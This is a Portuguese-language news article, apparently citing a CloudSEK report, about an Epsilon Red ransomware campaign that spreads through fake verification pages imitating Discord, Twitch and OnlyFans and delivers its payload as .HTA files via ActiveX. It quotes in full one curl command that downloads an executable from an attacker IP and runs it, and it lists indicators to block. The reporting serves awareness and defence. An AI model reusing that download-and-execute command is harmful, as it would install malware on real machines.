São Paulo — InkDesign News — Uma nova campanha sofisticada de ransomware está engajando usuários da internet em todo o mundo ao utilizar páginas de verificação falsas para disseminar uma ameaça perigosa chamada malware Epsilon Red. Este achado crítico foi revelado no mais recente relatório de inteligência de ameaças da CloudSEK, uma renomada empresa de cibersegurança.
Incidente e vulnerabilidade
O ataque, identificado pela primeira vez em julho de 2025, utiliza engenharia social, onde atacantes se passam por serviços online populares, como Discord, Twitch e OnlyFans. Eles induzem os usuários a baixar arquivos .HTA maliciosos, que são Aplicações HTML que podem executar scripts diretamente em um computador. De acordo com a análise da CloudSEK, esses downloads ocorrem em segundo plano sem o conhecimento do usuário, através do abuso do ActiveX, uma tecnologia que permite conteúdo interativo em navegadores web. Os comandos maliciosos, como curl -s -o a.exe http://155.94.155227:2269/dw/vir.exe && a.exe, realizam o download e a execução do ransomware. O processo é oculto por uma mensagem de verificação falsa que engana o usuário. Há uma interpretação interessante sobre um erro tipográfico na mensagem, “Verificatification”, que pode ter sido intencional para não levantar suspeitas.
Impacto e resposta
As consequências deste ataque podem ser sérias, com a possibilidade de exfiltração de dados e comprometimento de sistemas. A estrutura de suporte inclui vários domínios e endereços IP falsos que imitam serviços legítimos, levando a um aumento significativo das tentativas de infecção. Além disso, outro malware, o Quasar RAT, foi associado a esta campanha, sugerindo a possibilidade de controle remoto além do ransomware. Como mencionado por um especialista,
“A nova variante empurra as vítimas para uma segunda página onde a infecção ocorre sem qualquer aviso claro.”
(“The new variant pushes victims to a second page where the infection happens without any clear warning.”)— Equipe TRIA de CloudSEK
Mitigações recomendadas
A CloudSEK recomenda uma série de medidas para proteger os usuários contra esta ameaça emergente. A desativação do ActiveX e do Windows Script Host (WSH) nas configurações do computador é essencial para bloquear a execução desses tipos de scripts. As organizações também devem utilizar feeds de inteligência de ameaças para bloquear imediatamente IPs e domínios conhecidos dos atacantes, como twitchcc e 155.94.155227:2269. Além disso, a instalação de ferramentas de segurança em endpoints deve ser feita para detectar atividades ocultas, como programas que operam silenciosamente a partir de navegadores web. Segundo um analista,
“É crucial o treinamento contínuo de segurança, capacitando os usuários a reconhecer e evitar páginas de verificação falsas e tentativas de engenharia social.”
(“It is crucial to have continuous security training, empowering users to recognize and avoid fake verification pages and social engineering attempts.”)— Especialista em Cibersegurança
Os riscos residuais permanecem, e ações proativas são indispensáveis para garantir a segurança cibernética a longo prazo. À medida que esse cenário evolui, a conscientização e as práticas de segurança rigorosas se tornam cada vez mais necessárias.
Fonte: (Hack Read – Segurança Cibernética)
